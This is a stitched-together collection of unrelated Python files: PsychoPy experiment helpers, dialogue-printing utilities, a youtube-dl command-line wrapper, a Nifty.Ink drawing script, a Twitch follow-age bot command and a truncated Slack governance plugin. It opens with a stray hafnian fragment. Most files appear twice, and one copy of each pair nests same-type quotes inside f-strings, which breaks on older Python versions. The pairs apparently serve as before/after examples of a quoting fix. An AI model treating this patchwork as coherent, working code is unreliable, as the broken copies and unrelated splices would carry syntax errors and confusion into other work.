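# both printed values should agree up to floating-point error
print(permanent_bruteforce(M))
print(haf(block))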
# Utility functions for Psychopy Experiments # Author: Stefan Uddenberg from psychopy import core, data, event, gui import json import os def tabify(s): """ Takes an array of strings and outputs a single string separated by tab characters :type s: list :param s: list of strings :raises: N/A :rtype: string """ s = '\t'.join(s) return s def rgb2psychorgb(rgbVal): """ Takes a tuple rgbVal on scale from 0 to 255 and returns a tuple along the scale of -1 to 1 (with 0 being gray) :type rgbVal: tuple :param rgbVal: tuple of r,g,b values :raises: N/A :rtype: tuple """ return tuple((x - 127.5) / 127.5 for index, x in enumerate(rgbVal)) def show_instructions(instructions, instructions_list, key_dict, win): """ Shows each instruction string in the list one at a time. :type instructions: psychopy.visual.TextStim :param instructions: The instructions TextStim object :type instructions_list: list :param instructions_list: list of instruction strings :type key_dict: dict :param key_dict: Dictionary of usable key presses :raises: N/A :rtype: void """ for instr in instructions_list: instructions.setText(instr) instructions.draw() win.flip() keys = event.waitKeys(keyList=[v for k, v in key_dict.items()]) if key_dict["quit"] in keys: quit_experiment(win, core) def get_subject_info(data_dir, experiment_name): """ GUI for entering experiment info :type data_dir: string :param data_dir: Data directory :type experiment_name: string :param experiment_name: Name of the experiment :raises: N/A :rtype: """ last_params_file_name = f"{data_dir}{experiment_name}_#_lastParams.json" try: # note the '#', for file-ordering purposes # exp_info = misc.fromFile(last_params_file_name) with open(last_params_file_name, 'r') as fp: exp_info = json.load(fp) except: exp_info = { 'Experiment': experiment_name, 'Testing Location': '', 'Experimenter Initials': 'sdu', 'Subject Initials': '', 'Subject ID': '', 'Subject Age': '', 'Subject Gender': '', } exp_info['Start Date'] = data.getDateStr() dlg = gui.DlgFromDict(exp_info, title=experiment_name, fixed=['Start Date']) if dlg.OK: # misc.toFile(last_params_file_name, exp_info) with open(last_params_file_name, 'w') as fp: json.dump(exp_info, fp) else: core.quit() return exp_info def make_data_file(data_dir, exp_info, info_order, sync=True): """ Creates a data file :type exp_info: dict :param exp_info: Dictionary of experiment information :type info_order: list :param info_order: List of strings specifying the output file header :type sync: bool :param sync: :raises: N/A :rtype: file handle """ file_name = "_".join([exp_info['Experiment'], exp_info['Subject ID'], exp_info['Subject Initials'], exp_info['Subject Age'], exp_info['Subject Gender'], exp_info['Start Date']]) ext = '' i = 1 while os.path.exists(f"{file_name}{ext}.txt"): # changes filename extension to avoid overwriting ext = '-' + str(i) i += 1 file_name = f"{data_dir}{file_name}{ext}" data_file = open(f"{file_name}.txt", 'a') line = tabify(info_order) + '\n' data_file.write(line) if sync: data_file.flush() os.fsync(data_file) return data_file def make_subject_file(data_dir, exp_info, sub_info_order, sync=True): """ Creates a subject file for the experiment :type data_dir: string :param data_dir: Data directory :type exp_info: dict :param exp_info: Dictionary housing all experiment information :type sub_info_order: list :param sub_info_order: List of strings specifying output file header :type sync: :param sync: :raises: N/A :rtype: file_handle """ file_name = f"{data_dir}subFile_{exp_info["Experiment"]}.txt" # Write headers if 
necessary if not os.path.exists(file_name): line = tabify(sub_info_order) + '\n' # TABify with open(file_name, 'a') as sub_file: sub_file.write(line) sub_file = open(file_name, 'a') line = tabify([str(exp_info[variable]) for variable in sub_info_order]) line += '\n' # add a newline sub_file.write(line) if sync: sub_file.flush() os.fsync(sub_file) return sub_file def write_to_file(file_handle, info, info_order, sync=True): """ Writes a trial (a dictionary) to a fileHandle :type file_handle: :param file_handle: :type info: :param info: :type info_order: :param info_order: :type sync: :param sync: :raises: :rtype: void """ line = tabify([str(info[variable]) for variable in info_order]) + '\n' file_handle.write(line) if sync: file_handle.flush() os.fsync(file_handle) def quit_experiment(win, core): """ Quits an experiment :type win: psychopy.visual.Window :param win: The Window object from Psychopy :type core: psychopy.core :param core: The Core object from Psychopy :raises: N/A :rtype: void """ win.close() core.quit()
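# A minimal end-to-end sketch of how these helpers might be wired together.
# The window setup, key bindings, and trial dictionary below are illustrative
# placeholders rather than part of any particular experiment.
if __name__ == "__main__":
    from psychopy import visual

    data_dir = "./data/"
    info_order = ["Subject ID", "trial", "response", "rt"]

    exp_info = get_subject_info(data_dir, "demo_experiment")
    data_file = make_data_file(data_dir, exp_info, info_order)

    win = visual.Window(fullscr=False, color="black")
    instructions = visual.TextStim(win, text="")
    key_dict = {"continue": "space", "quit": "escape"}
    show_instructions(instructions, ["Welcome!", "Press space to begin."], key_dict, win)

    # ... run trials here, writing one row per trial ...
    trial = {"Subject ID": exp_info["Subject ID"], "trial": 1, "response": "left", "rt": 0.42}
    write_to_file(data_file, trial, info_order)

    quit_experiment(win, core)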
# Utility functions for Psychopy Experiments # Author: Stefan Uddenberg from psychopy import core, data, event, gui import json import os def tabify(s): """ Takes an array of strings and outputs a single string separated by tab characters :type s: list :param s: list of strings :raises: N/A :rtype: string """ s = '\t'.join(s) return s def rgb2psychorgb(rgbVal): """ Takes a tuple rgbVal on scale from 0 to 255 and returns a tuple along the scale of -1 to 1 (with 0 being gray) :type rgbVal: tuple :param rgbVal: tuple of r,g,b values :raises: N/A :rtype: tuple """ return tuple((x - 127.5) / 127.5 for index, x in enumerate(rgbVal)) def show_instructions(instructions, instructions_list, key_dict, win): """ Shows each instruction string in the list one at a time. :type instructions: psychopy.visual.TextStim :param instructions: The instructions TextStim object :type instructions_list: list :param instructions_list: list of instruction strings :type key_dict: dict :param key_dict: Dictionary of usable key presses :raises: N/A :rtype: void """ for instr in instructions_list: instructions.setText(instr) instructions.draw() win.flip() keys = event.waitKeys(keyList=[v for k, v in key_dict.items()]) if key_dict["quit"] in keys: quit_experiment(win, core) def get_subject_info(data_dir, experiment_name): """ GUI for entering experiment info :type data_dir: string :param data_dir: Data directory :type experiment_name: string :param experiment_name: Name of the experiment :raises: N/A :rtype: """ last_params_file_name = f"{data_dir}{experiment_name}_#_lastParams.json" try: # note the '#', for file-ordering purposes # exp_info = misc.fromFile(last_params_file_name) with open(last_params_file_name, 'r') as fp: exp_info = json.load(fp) except: exp_info = { 'Experiment': experiment_name, 'Testing Location': '', 'Experimenter Initials': 'sdu', 'Subject Initials': '', 'Subject ID': '', 'Subject Age': '', 'Subject Gender': '', } exp_info['Start Date'] = data.getDateStr() dlg = gui.DlgFromDict(exp_info, title=experiment_name, fixed=['Start Date']) if dlg.OK: # misc.toFile(last_params_file_name, exp_info) with open(last_params_file_name, 'w') as fp: json.dump(exp_info, fp) else: core.quit() return exp_info def make_data_file(data_dir, exp_info, info_order, sync=True): """ Creates a data file :type exp_info: dict :param exp_info: Dictionary of experiment information :type info_order: list :param info_order: List of strings specifying the output file header :type sync: bool :param sync: :raises: N/A :rtype: file handle """ file_name = "_".join([exp_info['Experiment'], exp_info['Subject ID'], exp_info['Subject Initials'], exp_info['Subject Age'], exp_info['Subject Gender'], exp_info['Start Date']]) ext = '' i = 1 while os.path.exists(f"{file_name}{ext}.txt"): # changes filename extension to avoid overwriting ext = '-' + str(i) i += 1 file_name = f"{data_dir}{file_name}{ext}" data_file = open(f"{file_name}.txt", 'a') line = tabify(info_order) + '\n' data_file.write(line) if sync: data_file.flush() os.fsync(data_file) return data_file def make_subject_file(data_dir, exp_info, sub_info_order, sync=True): """ Creates a subject file for the experiment :type data_dir: string :param data_dir: Data directory :type exp_info: dict :param exp_info: Dictionary housing all experiment information :type sub_info_order: list :param sub_info_order: List of strings specifying output file header :type sync: :param sync: :raises: N/A :rtype: file_handle """ file_name = f"{data_dir}subFile_{exp_info['Experiment']}.txt" # Write headers if 
necessary if not os.path.exists(file_name): line = tabify(sub_info_order) + '\n' # TABify with open(file_name, 'a') as sub_file: sub_file.write(line) sub_file = open(file_name, 'a') line = tabify([str(exp_info[variable]) for variable in sub_info_order]) line += '\n' # add a newline sub_file.write(line) if sync: sub_file.flush() os.fsync(sub_file) return sub_file def write_to_file(file_handle, info, info_order, sync=True): """ Writes a trial (a dictionary) to a fileHandle :type file_handle: :param file_handle: :type info: :param info: :type info_order: :param info_order: :type sync: :param sync: :raises: :rtype: void """ line = tabify([str(info[variable]) for variable in info_order]) + '\n' file_handle.write(line) if sync: file_handle.flush() os.fsync(file_handle) def quit_experiment(win, core): """ Quits an experiment :type win: psychopy.visual.Window :param win: The Window object from Psychopy :type core: psychopy.core :param core: The Core object from Psychopy :raises: N/A :rtype: void """ win.close() core.quit()
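# Quick sanity checks for the small helpers above (illustrative values only):
# mid-grey maps to 0.0 on PsychoPy's -1..1 colour scale, and tabify simply
# joins strings with tab characters.
if __name__ == "__main__":
    print(rgb2psychorgb((255, 127.5, 0)))            # (1.0, 0.0, -1.0)
    print(repr(tabify(["subject", "trial", "rt"])))  # 'subject\ttrial\trt'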
from __future__ import annotations import json import os.path import numpy as np from gcdf1.utils.dialogue import ( get_dialogue_outline, get_intent_by_turn, get_utterances, ) np.random.seed(0) def print_dialogue( dialogue: dict, print_index: bool = False, show_intent: bool = False ): """ Parameters ---------- dialogue See `get_dialogue_outline` for structure. print_index If True, each turn will have its number printed. show_intent In each user turn, the active intent is appended. """ utterances = get_utterances(dialogue) intents = [] if show_intent: intents = get_intent_by_turn(dialogue) for i, utterance in enumerate(utterances): if show_intent and i % 2 == 0: utterance = f"{utterance} <intent> {" AND ".join(intents[i // 2])}" if print_index: print(f"{i + 1}: {utterance}") else: print(f"{utterance}") def print_turn_outline(outline: dict[str, list[str]]): """ Parameters ---------- outline Output of `get_turn_actions`. """ for service in outline: print(*outline[service], sep="\n") print("") def print_dialogue_outline( dialogue: dict, text: bool = False, show_intent: bool = False ): """ Parameters ---------- dialogue See `get_dialogue_outline` for structure. text If `True`, also print the utterances alongside their outlines. show_intent If `True`, the intent is shown for each user utterance """ outlines = get_dialogue_outline(dialogue) utterances = get_utterances(dialogue) if text else [""] * len(outlines["dialogue"]) intents = get_intent_by_turn(dialogue) if show_intent else [] has_nlu = any(action_dict for action_dict in outlines["nlu"]) assert len(outlines["dialogue"]) == len(utterances) for i, (dial_outline, nlu_outline, utterance) in enumerate( zip(outlines["dialogue"], outlines["nlu"], utterances) ): if show_intent: utterance = f"{utterance} <intent> {" AND ".join(intents[i // 2])}" print(f"Turn: {i}:{utterance}") print_turn_outline(dial_outline) if has_nlu: print("#" * 15, " NLU ", "#" * 15) print_turn_outline(nlu_outline) print("") if __name__ == "__main__": file = os.path.join("../../", "data/raw/train/dialogues_001.json") with open(file, "r") as f: all_dialogues = json.load(f) # print a random dialogue outline and its turns # NB: This does not work correctly for multiple frames in the same turn dialogue = all_dialogues[np.random.randint(0, high=len(all_dialogues))] print_dialogue(dialogue) print("") print_dialogue_outline(dialogue, text=True) print("")
from __future__ import annotations import json import os.path import numpy as np from gcdf1.utils.dialogue import ( get_dialogue_outline, get_intent_by_turn, get_utterances, ) np.random.seed(0) def print_dialogue( dialogue: dict, print_index: bool = False, show_intent: bool = False ): """ Parameters ---------- dialogue See `get_dialogue_outline` for structure. print_index If True, each turn will have its number printed. show_intent In each user turn, the active intent is appended. """ utterances = get_utterances(dialogue) intents = [] if show_intent: intents = get_intent_by_turn(dialogue) for i, utterance in enumerate(utterances): if show_intent and i % 2 == 0: utterance = f"{utterance} <intent> {' AND '.join(intents[i // 2])}" if print_index: print(f"{i + 1}: {utterance}") else: print(f"{utterance}") def print_turn_outline(outline: dict[str, list[str]]): """ Parameters ---------- outline Output of `get_turn_actions`. """ for service in outline: print(*outline[service], sep="\n") print("") def print_dialogue_outline( dialogue: dict, text: bool = False, show_intent: bool = False ): """ Parameters ---------- dialogue See `get_dialogue_outline` for structure. text If `True`, also print the utterances alongside their outlines. show_intent If `True`, the intent is shown for each user utterance """ outlines = get_dialogue_outline(dialogue) utterances = get_utterances(dialogue) if text else [""] * len(outlines["dialogue"]) intents = get_intent_by_turn(dialogue) if show_intent else [] has_nlu = any(action_dict for action_dict in outlines["nlu"]) assert len(outlines["dialogue"]) == len(utterances) for i, (dial_outline, nlu_outline, utterance) in enumerate( zip(outlines["dialogue"], outlines["nlu"], utterances) ): if show_intent: utterance = f"{utterance} <intent> {' AND '.join(intents[i // 2])}" print(f"Turn: {i}:{utterance}") print_turn_outline(dial_outline) if has_nlu: print("#" * 15, " NLU ", "#" * 15) print_turn_outline(nlu_outline) print("") if __name__ == "__main__": file = os.path.join("../../", "data/raw/train/dialogues_001.json") with open(file, "r") as f: all_dialogues = json.load(f) # print a random dialogue outline and its turns # NB: This does not work correctly for multiple frames in the same turn dialogue = all_dialogues[np.random.randint(0, high=len(all_dialogues))] print_dialogue(dialogue) print("") print_dialogue_outline(dialogue, text=True) print("")
import sys from pathlib import Path if 'set env': sys.path.insert(0, str(Path(__file__).parent.parent)) from youtube_dl_cli import __version__, __exe_name__, __description__ from youtube_dl_cli.download_youtube_video import YLFormat, YoutubeKeeper from youtube_dl_cli.common.consoleHelper import text_color, Fore sys.path.remove(sys.path[0]) from typing import NewType import argparse Name = NewType('Name', str) class CLI: """Command Line Interface""" __slots__ = () BATCH_RUN: Name = 'batch_run' @classmethod def build_parser(cls): def init_common_parameter(sub_parser): ... def init_batch_fix(sub_parser: argparse.ArgumentParser): init_common_parameter(sub_parser) # the bach_fix is sub_parser.add_argument('url_list', help='youtube URL', metavar='URL', nargs='*') # convert to list automatically sub_parser.add_argument('-f', '--format', help=f'The output format. {text_color(f' '.join([msg for msg in YLFormat.__members__]))}' f' default: {text_color('mp4_640_360', Fore.BLUE)}', metavar='YLFormat', default=YLFormat.mp4_640_360, nargs='*', # multiple choice. choices=[key for key in YLFormat.__members__] ) sub_parser.add_argument('--output_dir', help='output directory. default: USERPROFILE/Music/my_music/', type=Path, default=None, ) sub_parser.add_argument('--write_thumbnail', help='Write the thumbnail image to a file', action='store_true', dest='write_thumbnail') sub_parser.add_argument('-q', '--quite', help='Do not print messages to stdout.', action='store_true', dest='quiet') description = __description__ usage = '\n'.join([desc for desc in ['@', 'full command: ' + text_color(f'{__exe_name__} batch_run "url_1" "url_2" --output_dir="C:/Users/Carson/Downloads" --format m4a mp4_144p --quiet --write_thumbnail'), 'voice only : ' + text_color(f'{__exe_name__} batch_run "url_1" -f m4a'), '@' ]]) main_parser = argparse.ArgumentParser(prog=f'{__exe_name__}.exe', description=description, usage=usage, formatter_class=argparse.RawTextHelpFormatter) main_parser.add_argument('--version', action='version', version='%(prog)s \n\tversion:' + f'{__version__}') sub_cmd: argparse._SubParsersAction = main_parser.add_subparsers( title='Available commands', dest='sub_cmd', metavar='' # metavar='SUBCOMMAND', help='DESCRIPTION' ) sub_cmd.required = True batch_fix = sub_cmd.add_parser(cls.BATCH_RUN, help='Automated Batch Processing') init_batch_fix(batch_fix) return main_parser def main(cmd_list: list = None): cli = CLI() parser = cli.build_parser() args = parser.parse_args(cmd_list) if cmd_list else parser.parse_args() fmt_list = [eval(f'{YLFormat.__name__}.{fmt}') for fmt in args.format] download_list = [(url, fmt_list) for url in args.url_list] options = dict(writethumbnail=args.write_thumbnail, quiet=args.quiet) dict_run_app = {cli.BATCH_RUN: lambda: YoutubeKeeper.start(download_list, output_dir=args.output_dir, **options)} app_name = args.sub_cmd dict_run_app[app_name]() return 'FINISHED'
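# Illustrative programmatic invocation; the URL is a placeholder. This mirrors
# running: <exe> batch_run "<url>" -f m4a --write_thumbnail
if __name__ == '__main__':
    result = main(['batch_run',
                   'https://www.youtube.com/watch?v=XXXXXXXXXXX',
                   '-f', 'm4a',
                   '--write_thumbnail'])
    print(result)  # "FINISHED"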
import sys from pathlib import Path if 'set env': sys.path.insert(0, str(Path(__file__).parent.parent)) from youtube_dl_cli import __version__, __exe_name__, __description__ from youtube_dl_cli.download_youtube_video import YLFormat, YoutubeKeeper from youtube_dl_cli.common.consoleHelper import text_color, Fore sys.path.remove(sys.path[0]) from typing import NewType import argparse Name = NewType('Name', str) class CLI: """Command Line Interface""" __slots__ = () BATCH_RUN: Name = 'batch_run' @classmethod def build_parser(cls): def init_common_parameter(sub_parser): ... def init_batch_fix(sub_parser: argparse.ArgumentParser): init_common_parameter(sub_parser) # the bach_fix is sub_parser.add_argument('url_list', help='youtube URL', metavar='URL', nargs='*') # convert to list automatically sub_parser.add_argument('-f', '--format', help=f'The output format. {text_color(f" ".join([msg for msg in YLFormat.__members__]))}' f' default: {text_color("mp4_640_360", Fore.BLUE)}', metavar='YLFormat', default=YLFormat.mp4_640_360, nargs='*', # multiple choice. choices=[key for key in YLFormat.__members__] ) sub_parser.add_argument('--output_dir', help='output directory. default: USERPROFILE/Music/my_music/', type=Path, default=None, ) sub_parser.add_argument('--write_thumbnail', help='Write the thumbnail image to a file', action='store_true', dest='write_thumbnail') sub_parser.add_argument('-q', '--quite', help='Do not print messages to stdout.', action='store_true', dest='quiet') description = __description__ usage = '\n'.join([desc for desc in ['@', 'full command: ' + text_color(f'{__exe_name__} batch_run "url_1" "url_2" --output_dir="C:/Users/Carson/Downloads" --format m4a mp4_144p --quiet --write_thumbnail'), 'voice only : ' + text_color(f'{__exe_name__} batch_run "url_1" -f m4a'), '@' ]]) main_parser = argparse.ArgumentParser(prog=f'{__exe_name__}.exe', description=description, usage=usage, formatter_class=argparse.RawTextHelpFormatter) main_parser.add_argument('--version', action='version', version='%(prog)s \n\tversion:' + f'{__version__}') sub_cmd: argparse._SubParsersAction = main_parser.add_subparsers( title='Available commands', dest='sub_cmd', metavar='' # metavar='SUBCOMMAND', help='DESCRIPTION' ) sub_cmd.required = True batch_fix = sub_cmd.add_parser(cls.BATCH_RUN, help='Automated Batch Processing') init_batch_fix(batch_fix) return main_parser def main(cmd_list: list = None): cli = CLI() parser = cli.build_parser() args = parser.parse_args(cmd_list) if cmd_list else parser.parse_args() fmt_list = [eval(f'{YLFormat.__name__}.{fmt}') for fmt in args.format] download_list = [(url, fmt_list) for url in args.url_list] options = dict(writethumbnail=args.write_thumbnail, quiet=args.quiet) dict_run_app = {cli.BATCH_RUN: lambda: YoutubeKeeper.start(download_list, output_dir=args.output_dir, **options)} app_name = args.sub_cmd dict_run_app[app_name]() return 'FINISHED'
from pyautonifty.constants import DRAWING_SIZE, BLACK from pyautonifty.pos import Pos from pyautonifty.drawing import Drawing from pyautonifty.renderer import Renderer # Draw straight lines that combine to create impression of curved lines def curved_lines(drawing, n=20): # init drawing step = DRAWING_SIZE / n # do curved lines for i in range(n + 1): offset = i * step # do bottom left line drawing.add_straight_line(Pos(offset, DRAWING_SIZE), Pos(0, offset), BLACK, DRAWING_SIZE / (25 * n)) # do top right drawing.add_straight_line(Pos(DRAWING_SIZE, offset), Pos(offset, 0), BLACK, DRAWING_SIZE / (25 * n)) # do diagonal lines for i in range(n - 1): offset = (i + 1) * step # do top left line drawing.add_straight_line(Pos(offset, 0), Pos(0, offset), BLACK, DRAWING_SIZE / (25 * n)) # do bottom right drawing.add_straight_line(Pos(DRAWING_SIZE, DRAWING_SIZE - offset), Pos(DRAWING_SIZE - offset, DRAWING_SIZE), BLACK, DRAWING_SIZE / (25 * n)) # do middle diagonal drawing.add_straight_line(Pos(DRAWING_SIZE, 0), Pos(0, DRAWING_SIZE), BLACK, DRAWING_SIZE / (25 * n)) return drawing if __name__ == "__main__": example_drawing = curved_lines(Drawing()) output_data = example_drawing.to_nifty_import() # Replace previous canvas contents in Nifty.Ink print(f"Lines: {len(example_drawing)}, " f"Points: {sum([len(line["points"]) for line in example_drawing])}, " f"Size: {(len(output_data) / 1024.0 ** 2):.2f}MB") with open("output.txt", "w") as file: file.write(output_data) # Init render class. renderer = Renderer() # Render in a very accurate (but slower) way. renderer.render(example_drawing, filename="curved_lines_%Y_%m_%d_%H-%M-%S-%f.png", simulate=True, allow_transparency=True, proper_line_thickness=True, draw_as_bezier=True, step_size=10)
from pyautonifty.constants import DRAWING_SIZE, BLACK from pyautonifty.pos import Pos from pyautonifty.drawing import Drawing from pyautonifty.renderer import Renderer # Draw straight lines that combine to create impression of curved lines def curved_lines(drawing, n=20): # init drawing step = DRAWING_SIZE / n # do curved lines for i in range(n + 1): offset = i * step # do bottom left line drawing.add_straight_line(Pos(offset, DRAWING_SIZE), Pos(0, offset), BLACK, DRAWING_SIZE / (25 * n)) # do top right drawing.add_straight_line(Pos(DRAWING_SIZE, offset), Pos(offset, 0), BLACK, DRAWING_SIZE / (25 * n)) # do diagonal lines for i in range(n - 1): offset = (i + 1) * step # do top left line drawing.add_straight_line(Pos(offset, 0), Pos(0, offset), BLACK, DRAWING_SIZE / (25 * n)) # do bottom right drawing.add_straight_line(Pos(DRAWING_SIZE, DRAWING_SIZE - offset), Pos(DRAWING_SIZE - offset, DRAWING_SIZE), BLACK, DRAWING_SIZE / (25 * n)) # do middle diagonal drawing.add_straight_line(Pos(DRAWING_SIZE, 0), Pos(0, DRAWING_SIZE), BLACK, DRAWING_SIZE / (25 * n)) return drawing if __name__ == "__main__": example_drawing = curved_lines(Drawing()) output_data = example_drawing.to_nifty_import() # Replace previous canvas contents in Nifty.Ink print(f"Lines: {len(example_drawing)}, " f"Points: {sum([len(line['points']) for line in example_drawing])}, " f"Size: {(len(output_data) / 1024.0 ** 2):.2f}MB") with open("output.txt", "w") as file: file.write(output_data) # Init render class. renderer = Renderer() # Render in a very accurate (but slower) way. renderer.render(example_drawing, filename="curved_lines_%Y_%m_%d_%H-%M-%S-%f.png", simulate=True, allow_transparency=True, proper_line_thickness=True, draw_as_bezier=True, step_size=10)
from requests import get
import time
from datetime import datetime


def cmd(self, user, channel, args):
    def url(arg):
        return f"https://api.twitch.tv/kraken/{arg}"

    headers = {"Client-ID": self.CLIENT_ID,
               "Authorization": f"OAuth {self.SETUP.startup()["token"]}",
               "Accept": "application/vnd.twitchtv.v5+json"}

    # Work out which user/channel pair to look up from the command arguments,
    # falling back to the sender and the current channel.
    try:
        user1 = args[0].lower()
        try:
            channel1 = args[1].lower()
        except IndexError:
            channel1 = channel["name"].lower()
            channel1 = channel1[1:len(channel1)]
            user1 = args[0].lower()
    except IndexError:
        user1 = user["name"].lower()
        channel1 = channel["name"].lower()
        channel1 = channel1[1:len(channel1)]

    if user1.lower() == channel1.lower():
        self.send_message(
            f"@{user["name"]}, you cannot follow yourself FeelsBadMan", channel["name"])
        return

    # resolve both login names to user IDs
    resp = get(url(f"users?login={user1.lower()},{channel1.lower()}"), headers=headers).json()
    if resp["_total"] <= 1:
        self.send_message("MrDestructoid Not Found", channel["name"])
        return

    sub_user_id = resp["users"][0]["_id"]
    sub_channel_id = resp["users"][1]["_id"]
    fa = get(url(f"users/{sub_user_id}/follows/channels/{sub_channel_id}"), headers=headers).json()
    print(fa)

    if "message" in fa:
        # the API returned an error payload instead of follow data
        if fa["message"] == "Follow not found":
            self.send_message(
                f"@{user["name"]}, {resp["users"][0]["display_name"]} is not following {resp["users"][1]["display_name"]} FeelsBadMan",
                channel['name'])
        return

    # e.g. 2021-02-12T14:44:03Z
    FMT = "%Y-%m-%dT%H:%M:%SZ"
    gmt = time.strftime(FMT, time.gmtime())
    print(gmt)
    follow_time = datetime.strptime(fa['created_at'], FMT)
    now_time = datetime.strptime(gmt, FMT)
    # whole months elapsed since the follow was created
    tdelta_month = (now_time.year - follow_time.year) * 12 + (now_time.month - follow_time.month)
    print(tdelta_month)

    self.send_message(
        f"@{user["name"]}, {resp["users"][0]["display_name"]} is following {resp["users"][1]["display_name"]} since {fa["created_at"]}",
        channel['name'])
from requests import get
import time
from datetime import datetime


def cmd(self, user, channel, args):
    def url(arg):
        return f"https://api.twitch.tv/kraken/{arg}"

    headers = {"Client-ID": self.CLIENT_ID,
               "Authorization": f"OAuth {self.SETUP.startup()['token']}",
               "Accept": "application/vnd.twitchtv.v5+json"}

    # Work out which user/channel pair to look up from the command arguments,
    # falling back to the sender and the current channel.
    try:
        user1 = args[0].lower()
        try:
            channel1 = args[1].lower()
        except IndexError:
            channel1 = channel["name"].lower()
            channel1 = channel1[1:len(channel1)]
            user1 = args[0].lower()
    except IndexError:
        user1 = user["name"].lower()
        channel1 = channel["name"].lower()
        channel1 = channel1[1:len(channel1)]

    if user1.lower() == channel1.lower():
        self.send_message(
            f"@{user['name']}, you cannot follow yourself FeelsBadMan", channel["name"])
        return

    # resolve both login names to user IDs
    resp = get(url(f"users?login={user1.lower()},{channel1.lower()}"), headers=headers).json()
    if resp["_total"] <= 1:
        self.send_message("MrDestructoid Not Found", channel["name"])
        return

    sub_user_id = resp["users"][0]["_id"]
    sub_channel_id = resp["users"][1]["_id"]
    fa = get(url(f"users/{sub_user_id}/follows/channels/{sub_channel_id}"), headers=headers).json()
    print(fa)

    if "message" in fa:
        # the API returned an error payload instead of follow data
        if fa["message"] == "Follow not found":
            self.send_message(
                f"@{user['name']}, {resp['users'][0]['display_name']} is not following {resp['users'][1]['display_name']} FeelsBadMan",
                channel['name'])
        return

    # e.g. 2021-02-12T14:44:03Z
    FMT = "%Y-%m-%dT%H:%M:%SZ"
    gmt = time.strftime(FMT, time.gmtime())
    print(gmt)
    follow_time = datetime.strptime(fa['created_at'], FMT)
    now_time = datetime.strptime(gmt, FMT)
    # whole months elapsed since the follow was created
    tdelta_month = (now_time.year - follow_time.year) * 12 + (now_time.month - follow_time.month)
    print(tdelta_month)

    self.send_message(
        f"@{user['name']}, {resp['users'][0]['display_name']} is following {resp['users'][1]['display_name']} since {fa['created_at']}",
        channel['name'])
import json import logging import random from rest_framework.exceptions import ValidationError import metagov.core.plugin_decorators as Registry import requests from metagov.core.errors import PluginErrorInternal from metagov.core.models import GovernanceProcess, Plugin, ProcessStatus, AuthType logger = logging.getLogger(__name__) @Registry.plugin class Slack(Plugin): name = "slack" auth_type = AuthType.OAUTH config_schema = { "type": "object", "properties": { # these are set automatically if using the oauth flow "team_id": {"description": "Slack Team ID", "type": "string"}, "team_name": {"description": "Slack Team Name", "type": "string"}, "bot_token": {"description": "Bot Token", "type": "string"}, "bot_user_id": {"description": "Bot User ID", "type": "string"}, }, } class Meta: proxy = True def receive_event(self, request): """ Passes on ALL received events to the driver """ json_data = json.loads(request.body) if json_data["type"] != "event_callback" or json_data["team_id"] != self.config["team_id"]: return # Data types: https://api.slack.com/apis/connections/events-api#the-events-api__receiving-events__events-dispatched-as-json # Event list: https://api.slack.com/events event = json_data["event"] # pop off 'type' and 'user' since they are represented separately in metagov-style event event_type = event.pop("type") maybe_user = event.pop("user", None) logger.debug(f"Received event {event_type}") initiator = { "user_id": maybe_user, "provider": "slack", "is_metagov_bot": maybe_user and maybe_user == self.config["bot_user_id"], } self.send_event_to_driver(event_type=event_type, initiator=initiator, data=event) @Registry.action( slug="post-message", input_schema={ "type": "object", "properties": {"users": {"type": "array", "items": {"type": "string"}}, "channel": {"type": "string"}}, }, description="Post message either in a channel, direct message, or multi-person message. Supports all params accepted by Slack method chat.postMessage.", ) def post_message(self, parameters): bot_token = self.config["bot_token"] data = {"token": bot_token, **parameters} # note: parameters may include a token override! 
if not parameters.get("users") and not parameters.get("channel"): raise ValidationError("users or channel are required") if parameters.get("users") and not parameters.get("channel"): # open a conversation for DM or multi person message users = ",".join(parameters.get("users")) params = {"token": bot_token, "users": users} response = self.slack_request("POST", "conversations.open", data=params) channel = response["channel"]["id"] logger.debug(f"Opened conversation {channel} with users {users}") data["channel"] = channel return self.slack_request("POST", "chat.postMessage", data=data) def join_conversation(self, channel): return self.slack_request( "POST", "conversations.join", data={"token": self.config["bot_token"], "channel": channel} ) @Registry.action( slug="method", input_schema={ "type": "object", "properties": {"method_name": {"type": "string"}}, "required": ["method_name"], }, description="Perform any Slack method (provided sufficient scopes)", ) def method(self, parameters): """ Action for performing any method in https://api.slack.com/methods See also: https://api.slack.com/web#basics Example usage: curl -iX POST "https://metagov.policykit.org/api/internal/action/slack.method" -H "accept: application/json" -H "X-Metagov-Community: slack-tmq3pkxt9" -d '{"parameters":{"method_name":"chat.postMessage", "channel":"C0177HZTV7X", "text":"hello world"}}' curl -iX POST "https://metagov.policykit.org/api/internal/action/slack.method" -H "accept: application/json" -H "X-Metagov-Community: slack-tmq3pkxt9" -d '{"parameters":{"channel":"C0177HZTV7X","method":"pins.add","timestamp":"1622820212.008000"}}' curl -iX POST "https://metagov.policykit.org/api/internal/action/slack.method" -H "accept: application/json" -H "X-Metagov-Community: slack-tmq3pkxt9" -d '{"parameters":{"channel":"C0177HZTV7X","method":"pins.remove","timestamp":"1622820212.008000"}}' """ method = parameters.pop("method_name") # note: parameters may include a token override! data = {"token": self.config["bot_token"], **parameters} try: return self.slack_request("POST", method, data=data) except PluginErrorInternal as e: # TODO: make this configurable, might not be desirable in all cases. Bot must be in the channel for `reaction.add` method to work (and others). if e.detail == "not_in_channel" and data.get("channel"): logger.warn(f"Failed with not_in_channel. 
Adding bot to channel {data['channel']} and retrying...") self.join_conversation(data["channel"]) return self.slack_request("POST", method, data=data) else: raise def slack_request(self, method, route, json=None, data=None): url = f"https://slack.com/api/{route}" logger.debug(f"{method} {url}") resp = requests.request(method, url, json=json, data=data) if not resp.ok: logger.error(f"{resp.status_code} {resp.reason}") logger.error(resp.request.body) raise PluginErrorInternal(resp.text) if resp.content: data = resp.json() is_ok = data.pop("ok") if not is_ok: # logger.debug(f"X-OAuth-Scopes: {resp.headers.get('X-OAuth-Scopes')}") # logger.debug(f"X-Accepted-OAuth-Scopes: {resp.headers.get('X-Accepted-OAuth-Scopes')}") # logger.debug(data["error"]) raise PluginErrorInternal(data["error"]) return data return {} EMOJI_MAP = { "numbers": [ "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "keycap_ten", ], "flowers": [ "tulip", "sunflower", "cherry_blossom", "rose", "wilted_flower", "bouquet", "hibiscus", "blossom", ], "hearts": [ "blue_heart", "purple_heart", "heart", "green_heart", "sparkling_heart", "orange_heart", "green_heart", ], } class Bool: YES = "yes" NO = "no" @Registry.governance_process class SlackEmojiVote(GovernanceProcess): # TODO(enhancement): let the caller define the emoji for each option # TODO(enhancement): add suport for "closing_at" time # TODO(enhancement): support single-choice and multiple-choice # TODO(enhancement): only 